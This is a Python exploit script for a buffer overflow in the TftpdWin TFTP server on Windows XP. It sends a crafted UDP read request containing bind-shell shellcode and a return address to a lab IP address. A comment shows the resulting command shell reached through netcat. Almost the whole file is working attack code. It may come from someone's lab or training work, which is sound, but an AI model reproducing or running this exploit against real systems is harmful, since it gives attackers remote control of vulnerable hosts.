#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/07/06 12:34:39 dhn Exp $
# ~ tftp  nc 172.16.133.129 28876
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\TftpdWin>dir
#  Volume in drive C has no label.
#   Volume Serial Number is 0CDE-D884
#
#    Directory of C:\Program Files\TftpdWin
#
#    07/06/2018  12:33 PM    <DIR>          .
#    07/06/2018  12:33 PM    <DIR>          ..
#    06/03/2006  01:44 PM           109,369 tftp.exe
#    06/03/2006  01:43 PM            57,206 tftpd.chm
#    06/03/2006  01:45 PM           493,026 tftpd.exe
#    07/06/2018  12:33 PM             4,389 unins000.dat
#    07/06/2018  12:33 PM           669,450 unins000.exe
#                   5 File(s)      1,333,440 bytes
#                   2 Dir(s)  39,599,943,680 bytes free
#
# C:\Program Files\TftpdWin>

import struct
import socket

# https://www.exploit-db.com/exploits/13504/
shellcode = (
	"\x31\xc9\x64\x8b\x71\x30\x8b\x76"
	"\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b"
	"\x7e\x20\x8b\x36\x38\x4f\x18\x75"
	"\xf3\x51\x68\x32\x5f\x33\x32\x68"
	"\x66\x56\x77\x73\x68\xb7\x8f\x09"
	"\x98\x89\xe6\xb5\x03\x29\xcc\x29"
	"\xcc\x89\xe7\xd6\xf3\xaa\x41\x51"
	"\x41\x51\x57\x51\x83\xef\x2c\xa4"
	"\x4f\x8b\x5d\x3c\x8b\x5c\x1d\x78"
	"\x01\xeb\x8b\x4b\x20\x01\xe9\x56"
	"\x31\xd2\x42\x8b\x34\x91\x01\xee"
	"\xb4\x36\xac\x34\x71\x28\xc4\x3c"
	"\x71\x75\xf7\x3a\x27\x75\xeb\x5e"
	"\x8b\x4b\x24\x01\xe9\x0f\xb7\x14"
	"\x51\x8b\x4b\x1c\x01\xe9\x89\xe8"
	"\x03\x04\x91\xab\x80\x3e\x09\x75"
	"\x08\x8d\x5e\x04\x53\xff\xd0\x57"
	"\x95\x80\x3e\x73\x75\xb1\x5e\xad"
	"\xff\xd0\xad\xff\xd0\x95\x81\x2f"
	"\xfe\xff\x8f\x33\x6a\x10\x57\xad"
	"\x55\xff\xd0\x85\xc0\x74\xf8\x31"
	"\xd2\x52\x68\x63\x6d\x64\x20\x8d"
	"\x7c\x24\x38\xab\xab\xab\xc6\x47"
	"\xe9\x01\x54\x87\x3c\x24\x57\x52"
	"\x52\x52\xc6\x47\xef\x08\x57\x52"
	"\x52\x57\x52\xff\x56\xe4\x8b\x46"
	"\xfc\xeb\xcd"
)

def p(x):
	return struct.pack("<L", x)

if __name__ == "__main__":
	# padding = "A" * 284 
	padding = "\x90" * 8
	padding += shellcode
	padding += "A" * (284 - len(shellcode) - 8)
	pop2ret = p(0x00418B51) # pop ebp; ret

	payload = "\x00\x01"
	payload += padding
	payload += pop2ret
	payload += "netascii\x00"

	print("[+] Sending the payload!")
	expl = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
	expl.connect(("172.16.133.129", 69))
	expl.send(payload)
	expl.close()
